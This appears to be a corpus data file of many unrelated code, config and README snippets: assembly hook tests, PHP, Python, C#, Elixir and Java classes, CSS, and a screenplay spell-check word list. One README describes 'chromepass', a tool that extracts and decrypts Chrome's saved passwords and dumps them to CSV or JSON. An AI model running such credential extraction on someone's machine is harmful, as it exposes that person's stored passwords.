\"IndirectJump\"\n lea rax, [rel target]\n jmp rax\n EndHookTestCase\n\n HookTestCase IndirectJump2, \"IndirectJump2\"\n lea rax, [target]\n mov [temp], rax\n mov rbx, [temp]\n jmp rbx\n EndHookTestCase\n\n HookTestCase IndirectJump3, \"IndirectJump3\"\n lea rbx, [target]\n jmp rbx\n EndHookTestCase\n\n HookTestCase IndirectJump4, \"IndirectJump4\"\n lea rcx, [target]\n jmp rcx\n EndHookTestCase\n\n HookTestCase IndirectJump5, \"IndirectJump5\"\n lea rcx, [target]\n mov [start], rcx\n jmp [start]\n EndHookTestCase\n\n HookTestCase PushRet, \"PushRet\"" +"--TEST--\nBug #45553 (Using XPath to return values for attributes with a namespace does not work)\n--SKIPIF--\n<?php if (!extension_loaded(\"simplexml\")) print \"skip\"; ?>\n--FILE--\n<?php\n$xml =<<<XML\n<xml xmlns:a=\"http://a\">\n <data a:label=\"I am A\" label=\"I am Nothing\">test1</data>\n <a:data a:label=\"I am a:A\" label=\"I am a:Nothing\">test2</a:data>\n</xml>\nXML;\n\n$x = simplexml_load_string($xml);\n$x->registerXPathNamespace(\"a\", \"http://a\");\n\n$atts = $x->xpath(\"/xml/data/@a:label\");\necho $atts[0] . \"\\n\";\n$atts = $x->xpath(\"/xml/a:data\");\necho $atts[0]->attributes() . \"\\n\";\n$atts = $x->xpath(\"/xml/a:data/@a:label\");\necho $atts[0] . \"\\n\";\n$atts = $x->xpath(\"/xml/a:data/@label\");\necho $atts[0] . \"\\n\";\n$atts = $x->xpath(\"/xml/data/@label\");\necho $atts[0] . \"\\n\";\n?>\n===DONE===\n--EXPECTF--\nI am A\nI am a:Nothing\nI am a:A\nI am a:Nothing\nI am Nothing\n===DONE===" +"# From 3.6 _sitebuiltins.py\n# Bug was in handling double nested kinds of things like:\n# for a in b for c in d\n\n# This required grammar modification and\n# and semantic action changes. LOAD_CLOSUREs are stored\n# inside a MAKE_TUPLE.\n\n# FIXME: test and try additional \"if\" clauses.\ndef __init__(self, path, name, files=(), dirs=(), volumes=()):\n f = [path.join(dir, filename)\n for dir in dirs\n for filename in files]\n f2 = [path.join(drive, dir, filename)\n for dir in dirs\n for filename in files\n for drive in volumes]\n return f, f2\n\n# From 3.6 codeop. The below listcomp is generated still\n# like it was in 3.5\nimport __future__\n_features = [getattr(__future__, fname)\n for fname in __future__.all_feature_names]" +"#partner-overview\n\n // Override .partner-shows styles\n .partner-shows\n .partner-shows-section.featured\n border-bottom 1px solid gray-color\n padding-bottom 50px\n .partner-shows-section-heading\n display none\n .partner-shows-section.lonely // lonely section\n border-bottom 0\n\n .partner-overview-section\n min-height 200px\n margin-bottom 50px\n border-bottom 1px solid gray-color\n &:last-child\n border none\n\n .partner-overview-messages\n min-height 0\n background-color #fff5db\n padding 100px 0\n position relative\n top -50px\n margin-bottom 0\n p\n text-align center\n color gray-darkest-color\n font-size 19px\n line-height 1.5\n &.message-title\n font-size 30px\n\n // Overwrite artists list styles\n .partner-overview-artists\n .artists-groups-container\n border-bottom 0\n\n // Artists grid styles\n .artists-grid\n .artists-grid-section\n margin-bottom 50px\n .artists-group-label\n font-size 18px\n margin-bottom 20px\n .partner-artist\n display inline-block\n vertical-align top\n width 22%\n box-sizing content-box\n margin 0 0 3% 0\n padding 0 2%\n &:nth-child(4n+1)\n padding-left 0\n &:nth-child(4n)\n padding-right 0\n &:nth-last-child(-n+4)\n margin-bottom 0\n img\n width 100%\n a\n text-decoration none\n .partner-artist-cover-image\n position relative\n margin-bottom 10px\n .partner-artist-overlay\n position absolute\n top 0\n bottom 0\n width 100%\n background-color black\n opacity 0\n transition opacity 0.3s ease-in-out\n &:hover\n opacity 0.4\n .partner-artists-see-all\n a\n font-size 13px\n &:hover:before\n border-bottom-width 2px\n margin-top 0.6em\n\n // Locations\n .partner-overview-locations\n ul.locations\n margin-top 20px\n text-align center\n li\n display inline-block\n vertical-align top\n margin 20px 30px" +"<?php\n\nnamespace Filterus\\Filters;\n\nclass Map extends \\Filterus\\Filter {\n \n protected $defaultOptions = array(\n 'filters' => array(),\n );\n\n public function filter($var) {\n if (!is_object($var) && !is_array($var)) {\n return null;\n }\n $isArray = is_array($var) || $var instanceof ArrayAccess;\n if (!$isArray) {\n $var = clone $var;\n }\n\n foreach ($this->options['filters'] as $key => $filter) {\n $filter = self::factory($filter);\n if ($isArray) {\n if (!isset($var[$key])) {\n $var[$key] = null;\n }\n $var[$key] = $filter->filter($var[$key]);\n } else {\n if (!isset($var->$key)) {\n $var->$key = null;\n }\n $var->$key = $filter->filter($var->$key);\n }\n }\n\n return $var;\n }\n\n public function validate($var) {\n if (!is_object($var) && !is_array($var)) {\n return false;\n }\n if (is_object($var)) {\n return $var == $this->filter($var);\n }\n return $var == $this->filter($var);\n }\n\n}" +"# process names are case-insensitive\n# you can use 'master' to indicate the master channel, or a list of process names to create a group\n# you can use 'mic' to control your mic input level (uses the default recording device)\n# you can use 'deej.unmapped' to control all apps that aren't bound to any slider (this ignores master, system, mic and device-targeting sessions) (experimental)\n# windows only - you can use 'deej.current' to control the currently active app (whether full-screen or not) (experimental)\n# windows only - you can use a device's full name, i.e. \"Speakers (Realtek High Definition Audio)\", to bind it. this works for both output and input devices\n# windows only - you can use 'system' to control the \"system sounds\" volume\n# important: slider indexes start at 0, regardless of which analog pins you're using!\nslider_mapping:\n 0: master\n 1: chrome.exe\n 2: spotify.exe\n 3:\n - pathofexile_x64.exe\n - rocketleague.exe\n 4: discord.exe\n\n# set this to true if you want the controls inverted (i.e. top is 0%, bottom is 100%)\ninvert_sliders: false\n\n# settings for connecting to the arduino board\ncom_port: COM4\nbaud_rate: 9600\n\n# adjust the amount of signal noise reduction depending on your hardware quality\n#" +"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\n\"\"\"\nPredict volumes of crystal structures.\n\"\"\"\n\nimport warnings\nimport os\n\nimport numpy as np\n\nfrom monty.serialization import loadfn\nfrom pymatgen.analysis.bond_valence import BVAnalyzer\nfrom pymatgen.analysis.structure_matcher import StructureMatcher\nfrom pymatgen.core import Structure\n\nMODULE_DIR = os.path.dirname(os.path.abspath(__file__))\nbond_params = loadfn(os.path.join(MODULE_DIR, 'DLS_bond_params.yaml'))\n\n\ndef _is_ox(structure):\n comp = structure.composition\n for k in comp.keys():\n try:\n k.oxi_state\n except AttributeError:\n return False\n return True\n\n\nclass RLSVolumePredictor:\n \"\"\"\n Reference lattice scaling (RLS) scheme that predicts the volume of a\n structure based on a known crystal structure.\n \"\"\"\n def __init__(self, check_isostructural=True, radii_type=\"ionic-atomic\",\n use_bv=True):\n \"\"\"\n Args:\n check_isostructural: Whether to test that the two structures are\n isostructural. This algo works best for isostructural compounds.\n Defaults to True.\n radii_type (str): Types of radii to use. You can specify \"ionic\"\n (only uses ionic radii), \"atomic\" (only uses atomic radii) or\n \"ionic-atomic\" (uses either ionic or atomic radii, with a\n preference for ionic where possible).\n use_bv (bool): Whether to use BVAnalyzer to determine oxidation\n states if not present.\n \"\"\"\n self.check_isostructural = check_isostructural\n self.radii_type = radii_type\n self.use_bv = use_bv\n\n def predict(self, structure, ref_structure):\n \"\"\"\n Given a structure, returns the predicted volume.\n\n Args:\n structure (Structure): structure w/unknown volume\n ref_structure (Structure):" +"import os\nimport json\n\n''' \tdotfile is a class for managing the local dotfile storage \n\t\t\t\n\t\t\tsaves a file called, '.fu' to your home directory\n\t\t\tthe file is format a json file\n\t\t\t\n\t\t\t{ \n\t\t\t\tresult\t: Last Search Result\n\t\t\t\tlast\t\t: Last Copied command\n\t\t\t\thistory\t: History of used commands\n\t\t\t}\n\n\t\t\tthe entire dot file is rewritten on every write\n\n'''\nclass dotfile:\n\t\t\n\t\t''' Initialize the dotfile '''\n\t\tdef __init__(self):\n\t\t\t\tself.path = os.path.join(os.getenv(\"HOME\"),'.fu')\n\t\t\t\tself.__load()\n\t\t\t\tself.history_size = 30\n\n\t\t''' Get the history of all the copied command '''\n\t\tdef history(self):\n\t\t\t\treturn self._history\n\t\t\t\t\n\t\t''' Get the command that was copied'''\n\t\tdef last(self):\n\t\t\t\treturn self._last\n\n\t\t''' Get the last search result '''\n\t\tdef result(self):\n\t\t\t\treturn str(self._result)\n\n\t\t''' Save the search result dotfile '''\n\t\tdef save_result(self,string):\n\t\t\t\tself._result = string\n\n\t\t''' Copy will add the string to be copied to the dotfile '''\n\t\tdef save_copy(self,string):\n\t\t\t\tself._last = string\n\t\t\t\tself.__record(string)\n\t\t\n\t\t''' Record will add a command to the history '''\n\t\tdef __record(self,string):\n\n\t\t\t\t# If we are at capacity, remove\n\t\t\t\tif len(self._history) >= self.history_size : \n\t\t\t\t\t\tself._history = self.history[:used_size]\n\t\t\t\t\n\t\t\t\t# Prepend to the history\n\t\t\t\tself._history.insert(0,string)\n\n\t\t''' Private file for loading the dotfile '''\n\t\tdef __load(self):\n\t\t\t\t\n\t\t\t\t# If the file doesn't exist make it\n\t\t\t\tif not os.path.isfile(self.path):\n\t\t\t\t\t\tself.__make()\n\t\t\t # Read the" +"/**\n@mainpage\n\n@section c_intro_sec Introduction\n\n\n\n@section c_install_sec Building and Installation\n\n@subsection starting Getting Started \n\nFor general instructions about how to install CCNx, please refer to\nthe top-level README file.\n\n@subsection howitworks How the c build works \n\nThe C build sticks as closely as possible to the common subset\nof make(1) features, using the Posix specifications as a guide.\n\nSince most (or all) make implementations have their own extensions, staying\nwithin this subset is a continual challenge. The CCNx build is tested with\nGNU make, BSD make, and Solaris make.\n\nThe ./configure script's main job is to build the conf.mk file that defines the\nconfigurable make macros. This is done largely just by using the\noutput of the uname command, but scripted configuration is possible as well.\nThe csrc/conf/ directory contains the system-specific make fragments and scripts.\n\nIf you need to override the configured values, put them into a file\nnamed csrc/conf/local.mk before you execute ./configure in csrc/.\n\nIt is also possible to define certain environment variables\nto modify default guesses of the ./configure script.\nThe most useful of these are:\n- CFLAGS (default: -g)\n- INSTALL_BASE (default: /usr/local)\n- AR (default: leave unset to be supplied by make)\n- CC" +"/*\n Title: Array\n \n A light weight implementation of dynamic array structure in C Macros.\n \n Each array actually consists of the following members\n \n (start code)\n ElementType* Name; //The pointer to elements.\n int Name_Index; //Index of the top element.\n int Name_Size; //Size allocated for the Array.\n (end)\n \n \n Constant: Array_Addition\n \n The number of empty elements to be added to an Array when an\n enlargement takes place.\n \n \n Section: Constructing/Destructing\n\n Macro: Array_Define\n \n Defines an Array.\n \n Usage:\n \n > Array_Define(Type, Name);\n \n This is equivalent to\n \n (start code)\n Type* Name;\n int Name_Index;\n int Name_Size;\n (end)\n \n Parameters:\n \n Type - Type of elements(e.g. int, float ...)\n \n Name - Name of the Array.\n \n \n Macro: Array_Gtor\n \n Defines and inits an Array.\n \n Usage:\n \n > Array_Gtor(Type, Name);\n \n Parameters:\n \n Type - Type of elements.\n \n Name - Name of the Array.\n \n \n Macro: Array_Ctor\n \n Inits an Array.\n \n Usage:\n \n > Array_Gtor(Type, Name);\n \n Parameters:\n \n Type - Type of elements.\n \n Name - Name of the Array.\n \n \n Macro: Array_Dtor\n \n Destructs(frees) an Array.\n \n Usage:\n \n > Array_Dtor(Type, Name);\n \n Parameters:\n \n Type - Type of elements.\n \n Name - Name of the Array.\n \n \n Macro: Array_ObjDtor\n \n Destructs an Array and automatically calls the destructor for each of \n its elements.\n \n Usage:\n \n > Array_ObjDtor(Type, Name);\n \n Parameters:\n \n Type - Type of elements.\n \n Name - Name of the Array.\n \n \n Section: Operations" +"# Feedback\nIf you have input on any of these goals or questions (and anything along these lines), drop a line as a Github issue with the 'feedback' label.\nI would be glad to discuss these with you.\n\n## Goals\nIn making this library, I had a number of design goals.\nI think they offer valuable context for any input you might have.\n\n- Keep the API surface minimal; provide configuration for the loading behaviour, but defer as much of the rendering as possible to the consumer\n- Make the state management in the components explicit and declarative\n- Provide auxiliary documentation for presentational patterns\n\n## Questions\nHere are some things I am wondering about that you might be able to help with:\n- Is the goal of the library apparent?\n- Do you think that the interface supports the goal of the library?\n- Were you able to figure out placeholder strategies? Are there things we could provide as examples?\n- Did you find the examples easy to navigate?" +"\ufeff//Copyright \u00a9 2014 Sony Computer Entertainment America LLC. See License.txt.\r\n\r\nusing System;\r\nusing System.ComponentModel.Composition;\r\nusing System.Windows.Forms;\r\nusing System.Diagnostics;\r\nusing System.Runtime.InteropServices;\r\n\r\nusing Sce.Atf;\r\n\r\nnamespace LevelEditorCore\r\n{\r\n\r\n /// <summary>\r\n /// Render loop driver.\r\n /// It continously call update/render as long as \r\n /// there is no message in the windows message queue. \r\n /// </summary>\r\n [Export(typeof(RenderLoopService))]\r\n [Export(typeof(IInitializable))]\r\n [PartCreationPolicy(CreationPolicy.Shared)]\r\n public class RenderLoopService : IInitializable\r\n { \r\n #region IInitializable Members\r\n\r\n void IInitializable.Initialize()\r\n {\r\n Application.Idle += Application_Idle;\r\n }\r\n\r\n #endregion\r\n\r\n\r\n\r\n\r\n //[Import(AllowDefault = true)]\r\n //private IDesignView m_designView = null;\r\n\r\n\r\n private void Application_Idle(object sender, EventArgs e)\r\n {\r\n //if (m_designView != null)\r\n //{\r\n // while (!PeekMessage(out m_msg, IntPtr.Zero, 0, 0, 0))\r\n // {\r\n // m_designView.Tick();\r\n // System.Threading.Thread.Sleep(1);\r\n // }\r\n //}\r\n }\r\n \r\n\r\n /// <summary>Windows Message</summary>\r\n [StructLayout(LayoutKind.Sequential)]\r\n private struct Message\r\n {\r\n public IntPtr hWnd;\r\n public uint msg;\r\n public IntPtr wParam;\r\n public IntPtr lParam;\r\n public uint time;\r\n public System.Drawing.Point p;\r\n }\r\n\r\n [System.Security.SuppressUnmanagedCodeSecurity]\r\n [DllImport(\"User32.dll\", CharSet = CharSet.Auto)]\r\n private static extern bool PeekMessage(out Message msg, IntPtr hWnd, uint messageFilterMin, uint messageFilterMax, uint flags); \r\n //private Message m_msg; \r\n }\r\n}" +"defmodule Geolix.Adapter.Fake.Storage do\n @moduledoc false\n\n use Agent\n\n @doc false\n @spec start_link(map) :: Agent.on_start()\n def start_link(init_arg) when is_map(init_arg) do\n Agent.start_link(fn -> init_arg end, name: __MODULE__)\n end\n\n @doc \"\"\"\n Fetches the data for a database.\n \"\"\"\n @spec get_data(atom) :: map | nil\n def get_data(database) do\n {data, _} = get(database)\n\n data\n end\n\n @doc \"\"\"\n Fetches the metadata for a database.\n \"\"\"\n @spec get_meta(atom) :: map | nil\n def get_meta(database) do\n {_, meta} = get(database)\n\n meta\n end\n\n @doc \"\"\"\n Stores the data for a specific database.\n \"\"\"\n @spec set(atom, {map | nil, map | nil}) :: :ok\n def set(database, dataset) do\n Agent.update(__MODULE__, &Map.put(&1, database, dataset))\n end\n\n defp get(database) do\n Agent.get(__MODULE__, &Map.get(&1, database, {%{}, %{}}))\n end\nend" +"chromepass\n==========\n\nGet all passwords stored by Chrome on WINDOWS and Unix based systems (except MAC OS).\n\n# Information\n\nGoogle Chrome stores all passwords you saved by pressing 'REMEMBER ME' in a database at \n\n``` Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Login Data ```\n\nIt encrypts passwords with the Windows <b>CryptProtectData</b> function. \nYou can find the encryptor at the [Chromium Github Page](https://github.com/chromium/chromium/blob/trunk/chrome/browser/password_manager/encryptor_win.cc)\n\nOn Windows, please install [PyWin32](https://sourceforge.net/projects/pywin32/) before running the scrypt.\n\n# Run\n\nTo print output simply:\n``` python chromepass.py -d ```\n\n\nTo write to csv file:\n``` python chromepass.py --o csv ```\n\nTo write to json file:\n``` python chromepass.py --o json ```\n\n\n# Author\n\n[Hassaan Ali Wattoo](https://twitter.com/hassaanaliw)" +"# Testing Magento 2\n\n**Warden** is the first Development Environment that has testing in the blood.\n\nTo enable testing components, set the following configuration in your project's `.env` file:\n\n```\nWARDEN_TEST_DB=1\n```\n\nThis will launch an additional MySQL 5.7 database instance running on `tempfs` (blazing-fast memory) storage.\n\nTemporary file locations have also been mounted into `tempfs` memory stoage:\n\n- `/var/www/html/dev/tests/integration/tmp/`\n\n## Running Unit Tests\n\nCreate your `phpunit.xml` using contents of `phpunit.xml.dist`. We recommend customizing values of:\n\n- Memory usage `TESTS_MEM_USAGE_LIMIT` with value of `8G` should be enough\n\n ```xml\n <php>\n <const name=\"TESTS_MEM_USAGE_LIMIT\" value=\"8G\"/>\n </php> \n ```\n \nThat's it! Now you are ready to run Unit Tests.\n\n### Execution\n\n- To run all tests declared in `phpunit.xml` execute:<br> `vendor/bin/phpunit -c dev/tests/unit/phpunit.xml`\n- If you need to run only specific directory, execute:<br> `vendor/bin/phpunit -c dev/tests/unit/phpunit.xml {PATH TO TESTS}` \n\n### Debugging\n\nIf you have [configured Xdebug](xdebug.md), run Unit tests inside **Debug** console (`warden debug` instead of `warden shell`). The code execution will stop at the breakpoints.\n\n## Running Javascript Unit Tests\n\n1. Configure your `.env` and set `NODE_VERSION=10`\n2. Launch a shell session within the project environment's `php-fpm` container with `warden shell`\n3. Install javascript unit test dependencies with `npm install`\n4. Deploy static content" +"# rs-dnn Sample\n\n## Overview\nThis example shows how to use Intel RealSense cameras with existing [Deep Neural Network](https://en.wikipedia.org/wiki/Deep_learning) algorithms. The demo is derived from [MobileNet Single-Shot Detector example](https://github.com/opencv/opencv/blob/3.4.0/samples/dnn/ssd_mobilenet_object_detection.cpp) provided with `opencv`. We modify it to work with Intel RealSense cameras and take advantage of depth data (in a very basic way). \n\n\nThe demo will load existing [Caffe model](https://github.com/chuanqi305/MobileNet-SSD) (see another tutorial [here](https://docs.opencv.org/3.3.0/d5/de7/tutorial_dnn_googlenet.html)) and use it to classify objects within the RGB image. Once object is detected, the demo will calculate approximate distance to the object using the depth data:\n\n<p align=\"center\"><img src=\"res/1.PNG\" /></p>\n\n## Implementation Details\n\nUnlike the other samples, this demo requires access to the exact depth values. We generate a matrix of floating point values (in meters) using the following helper function:\n```cpp\nauto depth_mat = depth_frame_to_meters(pipe, depth_frame);\n```" +"# WMI Query that specifies what events we will watch for\n$Query = \"Select * from __InstanceModificationEvent within 3 where TargetInstance ISA 'MSVM_ComputerSystem' `\n and TargetInstance.EnabledState <> PreviousInstance.EnabledState\"\n\n# Script block that will run whenever the event fires\n[ScriptBlock]$Action = {\n $VMName = $Event.SourceEventArgs.NewEvent.TargetInstance.ElementName\n\n switch ($Event.SourceEventArgs.NewEvent.TargetInstance.EnabledState)\n {\n 2 {$vmState = \"running\"}\n 3 {$vmState = \"turned off\"}\n 9 {$vmState = \"paused\"}\n 6 {$vmState = \"in a saved state\"}\n 10 {$vmState = \"starting\"}\n 4 {$vmState = \"stopping\"}\n default {$vmState = \"in an unknown state...\"}\n }\n\n if ($Event.SourceEventArgs.NewEvent.TargetInstance.EnabledState -eq 1)\n {\n $vmState = $Event.SourceEventArgs.NewEvent.TargetInstance.OtherEnabledState\n }\n\n Write-Host \"The virtual machine '$($vmName)' is now $($vmState).\"\n}\n\n# Register for the events\nRegister-WMIEvent -Query $Query -Action $Action -Namespace root\\virtualization\\v2\n\n# To clean up - run \"Get-EventSubscriber | Unregister-Event\"" +"// Copyright (c) Microsoft Corporation.\r\n// Licensed under the MIT License.\r\n\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Diagnostics.ContractsLight;\r\nusing ContentStoreTest.Test;\r\n\r\nnamespace ContentStoreTest.Performance\r\n{\r\n public class PerformanceResults\r\n {\r\n private readonly Dictionary<string, Tuple<long, string, long>> _results =\r\n new Dictionary<string, Tuple<long, string, long>>(StringComparer.OrdinalIgnoreCase);\r\n\r\n public void Add(string name, long value, string units, long count = 0)\r\n {\r\n Contract.Requires(name != null);\r\n _results.Add(name, Tuple.Create(value, units, count));\r\n }\r\n\r\n public void Report()\r\n {\r\n if (_results.Count > 0)\r\n {\r\n var logger = TestGlobal.Logger;\r\n\r\n foreach (var kvp in _results)\r\n {\r\n var itemCount = kvp.Value.Item3;\r\n if (itemCount > 0)\r\n {\r\n logger.Always(\"{0} = {1} {2} ({3} items)\", kvp.Key, kvp.Value.Item1, kvp.Value.Item2, kvp.Value.Item3);\r\n }\r\n else\r\n {\r\n logger.Always(\"{0} = {1} {2}\", kvp.Key, kvp.Value.Item1, kvp.Value.Item2);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}" +"\"\"\"\nDummy layout. Used when somebody creates an `Application` without specifying a\n`Layout`.\n\"\"\"\nfrom prompt_toolkit.formatted_text import HTML\nfrom prompt_toolkit.key_binding import KeyBindings\nfrom prompt_toolkit.key_binding.key_processor import KeyPressEvent\n\nfrom .containers import Window\nfrom .controls import FormattedTextControl\nfrom .dimension import D\nfrom .layout import Layout\n\n__all__ = [\n \"create_dummy_layout\",\n]\n\nE = KeyPressEvent\n\n\ndef create_dummy_layout() -> Layout:\n \"\"\"\n Create a dummy layout for use in an 'Application' that doesn't have a\n layout specified. When ENTER is pressed, the application quits.\n \"\"\"\n kb = KeyBindings()\n\n @kb.add(\"enter\")\n def enter(event: E) -> None:\n event.app.exit()\n\n control = FormattedTextControl(\n HTML(\"No layout specified. Press <reverse>ENTER</reverse> to quit.\"),\n key_bindings=kb,\n )\n window = Window(content=control, height=D(min=1))\n return Layout(container=window, focused_element=window)" +"from db import Database\nfrom metadata import MetadataPlugin, MetadataPluginConfig\nfrom typing import Optional, List, IO\nimport gzip\nimport shutil\nimport tempfile\n\n\nclass GzipPlugin(MetadataPlugin):\n \"\"\" Can be used to automatically extract gzip contents before running\n Yara on them. This plugin will look for all files that end with .gz,\n and add extract them to disk before further processing.\n \"\"\"\n\n is_filter = True\n\n def __init__(self, db: Database, config: MetadataPluginConfig) -> None:\n super().__init__(db, config)\n self.tmpfiles: List[IO[bytes]] = []\n\n def filter(self, orig_name: str, file_path: str) -> Optional[str]:\n tmp = tempfile.NamedTemporaryFile()\n self.tmpfiles.append(tmp)\n if orig_name.endswith(\".gz\"):\n with gzip.open(file_path, \"rb\") as f_in:\n with open(tmp.name, \"wb\") as f_out:\n shutil.copyfileobj(f_in, f_out)\n return tmp.name\n\n return file_path\n\n def clean(self):\n for tmp in self.tmpfiles:\n tmp.close()\n self.tmpfiles = []" +"# Test behavior on strange (invalid?) elf files where the sections cross segment\n# boundary. The test input was generated from this yaml file, but the program\n# header was modified by hand, so this input is here for reference only.\n#\n# Right now lldb shortens sections to make sure every section is fully contained\n# within a segment, but other behaviors are possible too (including outright\n# rejecting such files).\n\n# RUN: lldb-test object-file %S/Inputs/PT_LOAD-overlap-section.elf | FileCheck %s\n\n# CHECK: Index: 0\n# CHECK-NEXT: ID: 0xffffffffffffffff\n# CHECK-NEXT: Name: PT_LOAD[0]\n# CHECK-NEXT: Type: container\n# CHECK-NEXT: Permissions: rwx\n# CHECK-NEXT: Thread specific: no\n# CHECK-NEXT: VM address: 0x1006\n# CHECK-NEXT: VM size: 8\n# CHECK-NEXT: File size: 8\n# CHECK-NEXT: Showing 1 subsections\n# CHECK-NEXT: Index: 0\n# CHECK-NEXT: ID: 0x2\n# CHECK-NEXT: Name: .text\n# CHECK-NEXT: Type: code\n# CHECK-NEXT: Permissions: r-x\n# CHECK-NEXT: Thread specific: no\n# CHECK-NEXT: VM address: 0x1008\n# CHECK-NEXT: VM size: 6\n# CHECK-NEXT: File size: 8\n\n# CHECK: Index: 1\n# CHECK-NEXT: ID: 0x1\n# CHECK-NEXT: Name: .interp\n# CHECK-NEXT: Type: regular\n# CHECK-NEXT: Permissions: r--\n# CHECK-NEXT: Thread specific: no\n# CHECK-NEXT: VM address: 0x1000\n# CHECK-NEXT: VM size: 6" +"\ufeffusing System.Collections.Generic;\nusing BizHawk.Emulation.Cores.Components.Z80A;\nusing BizHawk.Emulation.Cores.Sound;\n\nnamespace BizHawk.Emulation.Cores.Computers.SinclairSpectrum\n{\n\t/// <summary>\n\t/// 128K Constructor\n\t/// </summary>\n\tpublic partial class Pentagon128 : SpectrumBase\n\t{\n\t\t/// <summary>\n\t\t/// Main constructor\n\t\t/// </summary>\n\t\tpublic Pentagon128(ZXSpectrum spectrum, Z80A cpu, ZXSpectrum.BorderType borderType, List<byte[]> files, List<JoystickType> joysticks)\n\t\t{\n\t\t\tSpectrum = spectrum;\n\t\t\tCPU = cpu;\n\n\t\t\tCPUMon = new CPUMonitor(this) { machineType = MachineType.Pentagon128 };\n\n\t\t\tROMPaged = 0;\n\t\t\tSHADOWPaged = false;\n\t\t\tRAMPaged = 0;\n\t\t\tPagingDisabled = false;\n\n\t\t\tULADevice = new ScreenPentagon128(this);\n\n\t\t\tBuzzerDevice = new OneBitBeeper(44100, ULADevice.FrameLength, 50, \"SystemBuzzer\");\n\n\t\t\tTapeBuzzer = new OneBitBeeper(44100, ULADevice.FrameLength, 50, \"TapeBuzzer\");\n\n\t\t\tAYDevice = new AY38912(this);\n\t\t\tAYDevice.Init(44100, ULADevice.FrameLength);\n\n\t\t\tKeyboardDevice = new StandardKeyboard(this);\n\n\t\t\tInitJoysticks(joysticks);\n\n\t\t\tTapeDevice = new DatacorderDevice(spectrum.SyncSettings.AutoLoadTape);\n\t\t\tTapeDevice.Init(this);\n\n\t\t\tInitializeMedia(files);\n\t\t}\n\t}\n}" +"\nMISSPELLED WORDS\n\nJonze\nINT\nTHEODORE'S\nparents'\npg\nO\nS\nBeautifulhandwrittenletters\npg\nINT\nTHEODORE'S\nBadass\nBuh\nINT\nTHEODORE'S\npg\nemails\nLewman's\nmopey\npg\nemails\nINT\nhandheld\nbetw\nINT\nINT\nTHEODORE'S\nINT\nTHEODORE'S\npg\nINT\nTHEODORE'S\nburrito\nD\nINT\nTHEODORE'S\nINT\nTHEODORE'S\nINT\nTHEODORE'S\npg\nSEXYKITTEN\nSexyKitten\nSEXYKITTEN\nBigGuy\nSEXYKITTEN\nstudmuffin\npg\nSEXYKITTEN\nsexykitten\nSEXYKITTEN\nMmm\nUm\nSEXYKITTEN\nSEXYKITTEN\nSEXYKITTEN\npg\nSEXYKITTEN\nUm\nSEXYKITTEN\nSEXYKITTEN\nSEXYKITTEN\nSEXYKITTEN\nSEXYKITTEN\nAHHHHHHHHHHHH\nSEXYKITTEN\npg\nSEXYKITTEN\nINT\nelectronica\nINT\nTHEODORE'S\npg\nMmm\nUh\num\npg\nwhat'll\nSamantha\nSAMANTHA\npg\nSAMANTHA\nSamantha\nSAMANTHA\nSAMANTHA\nhundredths\nSAMANTHA\nSAMANTHA\npg\nSAMANTHA\nSAMANTHA\nSAMANTHA\nSAMANTHA\nSAMANTHA\nSAMANTHA\nTheodore's\nSAMANTHA\nUm\npg\nD\nSAMANTHA\nemails\nemails\nSamantha\nSAMANTHA\nSAMANTHA\nSAMANTHA\nSAMANTHA\npg\nINT\nTHEODORE'S\nSAMANTHA\nUm\nSAMANTHA\nSAMANTHA\nSAMANTHA\nTheodore's\nSAMANTHA\nSAMANTHA\npg\nSAMANTHA\nSamantha\nTheodore's\nSAMANTHA\nTheodore's\nSAMANTHA\nSAMANTHA\npg\nSAMANTHA\nSAMANTHA\nSAMANTHA\nINT\nTHEODORE'S\nTheo\nUh\num\npg\nINT\nTHEODORE'S\npg\nINT\nTHEODORE'S\nTheodore's\nSAMANTHA\nSAMANTHA\npg\nUh\nSAMANTHA\nSAMANTHA\nsoooo\nTheodore's\nfuckface\nfuckhead\nshitface\nfuckhead\nSAMANTHA\npg\nfuckhead\nfarts\nSAMANTHA\nLewman\nSAMANTHA\nLewman\nSAMANTHA\ngoddaughter's\npg\nSAMANTHA\nSAMANTHA\nlaude\nSAMANTHA\nSAMANTHA\nemails\nSAMANTHA\nSAMANTHA\nSamantha\npg\nSAMANTHA\nSAMANTHA\nSAMANTHA\nSAMANTHA\nSAMANTHA\nSamantha\npg\nSAMANTHA\nSAMANTHA\nSamantha\nsnickers\nINT\npg\nTheo's\nINT\nINT\npg\nTheodore's\nSAMANTHA\nSAMANTHA\nemails\npg" +"package com.mashibing.dp.builder;\n\npublic class Person {\n int id;\n String name;\n int age;\n double weight;\n int score;\n Location loc;\n\n private Person() {}\n\n public static class PersonBuilder {\n Person p = new Person();\n\n public PersonBuilder basicInfo(int id, String name, int age) {\n p.id = id;\n p.name = name;\n p.age = age;\n return this;\n }\n\n public PersonBuilder weight(double weight) {\n p.weight = weight;\n return this;\n }\n\n public PersonBuilder score(int score) {\n p.score = score;\n return this;\n }\n\n public PersonBuilder loc(String street, String roomNo) {\n p.loc = new Location(street, roomNo);\n return this;\n }\n\n public Person build() {\n return p;\n }\n }\n}\n\nclass Location {\n String street;\n String roomNo;\n\n public Location(String street, String roomNo) {\n this.street = street;\n this.roomNo = roomNo;\n }\n}" +"\ufeffusing System;\nusing Newtonsoft.Json;\n\nnamespace Microsoft.Deployment.Common.Model.Informatica\n{\n public class InformaticaSchedule : InformaticaObject\n {\n [JsonProperty(\"orgId\", NullValueHandling = NullValueHandling.Ignore)]\n public string OrgId;\n\n [JsonProperty(\"startTime\", NullValueHandling = NullValueHandling.Ignore)]\n public DateTime StartTime = new DateTime(DateTime.Now.Year, DateTime.Now.Month, DateTime.Now.Day, 1, 0, 0, DateTimeKind.Utc);\n\n [JsonProperty(\"interval\", NullValueHandling = NullValueHandling.Ignore)]\n public string Interval;\n\n [JsonProperty(\"frequency\")]\n public int Frequency = 1;\n\n [JsonProperty(\"mon\")]\n public bool Mon = true;\n\n [JsonProperty(\"tue\")]\n public bool Tue = true;\n\n [JsonProperty(\"wed\")]\n public bool Wed = true;\n\n [JsonProperty(\"thu\")]\n public bool Thu = true;\n\n [JsonProperty(\"fri\")]\n public bool Fri = true;\n\n [JsonProperty(\"sat\")]\n public bool Sat = true;\n\n [JsonProperty(\"sun\")]\n public bool Sun = true;\n\n [JsonProperty(\"weekDay\")]\n public const bool WeekDay = false;\n\n [JsonProperty(\"dayOfMonth\")]\n public const int DayOfMonth 